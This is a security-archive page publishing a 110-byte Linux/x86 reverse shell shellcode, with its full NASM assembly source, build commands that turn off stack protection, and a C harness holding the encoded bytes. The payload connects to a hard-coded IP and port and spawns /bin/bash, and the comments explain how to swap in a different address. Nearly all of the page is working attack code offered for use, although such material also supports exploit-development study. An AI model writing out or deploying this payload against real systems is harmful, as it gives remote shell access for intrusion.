Linux/x86 Reverse Shell Shellcode

Linux/x86 Reverse Shell Shellcode: Posted Mar 25, 2017; Authored by Jasmin Landry; 110 bytes small Linux/x86 reverse /bin/bash shellcode.; tags | x86, shellcode, bash; systems | linux; SHA-256 | c877dbeb641d857b55e73f461a09ca14679ca4f290a989b9b455e4512cce7981; Download | Favorite | View

Linux/x86 Reverse Shell Shellcode

/*
; File name: reversebash.nasm
; Author:  Jasmin Landry (@JR0ch17)
; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
; To change
; Shellcode length: 110 bytes
; Tested on Ubuntu 12.04.5 32-bit (x86)
; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
; Link: ld -z execstack -o reversebash reversebash.o
; Use objdump to find shellcode and copy it over to the code section of the .c file
; Compile: gcc -m32 -fno-stack-protector -z execstack reversebash.c -o reversebash2
 
global _start           
 
section .text
_start:
    jmp short call_shellcode
 
shellcode:
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
 
    pop edx 
 
    push 0x6
    push 0x1
    push 0x2
 
    mov al, 0x66
    mov bl, 0x1
    mov ecx, esp
    int 0x80
 
    mov esi, eax
 
    xor eax, eax
    push eax
    push dword [edx+2]
    push word [edx]
    push word 0x2
    mov ecx, esp
    push 0x10
    push ecx
    push esi
    mov al, 0x66
    mov bl, 0x3
    mov ecx, esp
    int 0x80
 
    xor ecx, ecx
    mov cl, 0x3
 
loop:
    dec cl
    mov al, 0x3f
    mov ebx, esi
    int 0x80
 
    mov esi, eax
    jnz loop
 
    xor eax, eax
    xor ecx, ecx
    push ecx
    push 0x68736162
    push 0x2f6e6962
    push 0x2f2f2f2f
    mov ebx, esp
    push ecx
    push ebx
    mov al, 0xb
    mov ecx, esp
    xor edx, edx
    int 0x80
 
call_shellcode:
    call shellcode
    port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 ;First 2 bytes are port and last 4 are IP. Please change these bytes to reflect your environment and recompile.
 
*/
 
 
#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\xeb\x61\x31\xc0\x31\xdb\x31\xc9\x5a\x6a\x06\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\xff\x72\x02\x66\xff\x32\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\x89\xf3\xcd\x80\x89\xc6\x75\xf4\x31\xc0\x31\xc9\x51\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x51\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80\xe8\x9a\xff\xff\xff\xd4\x31\xc0\xa8\x03\x77"; //Again, the last 4 bytes are the IP and the 2 before those are the port.
 
main()
{
 
        printf("Shellcode Length:  %d\n", strlen(code));
 
        int (*ret)() = (int(*)())code;
 
        ret();
 
}

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Linux/x86 Reverse Shell Shellcode

Linux/x86 Reverse Shell Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Linux/x86 Reverse Shell Shellcode

Share This

Linux/x86 Reverse Shell Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems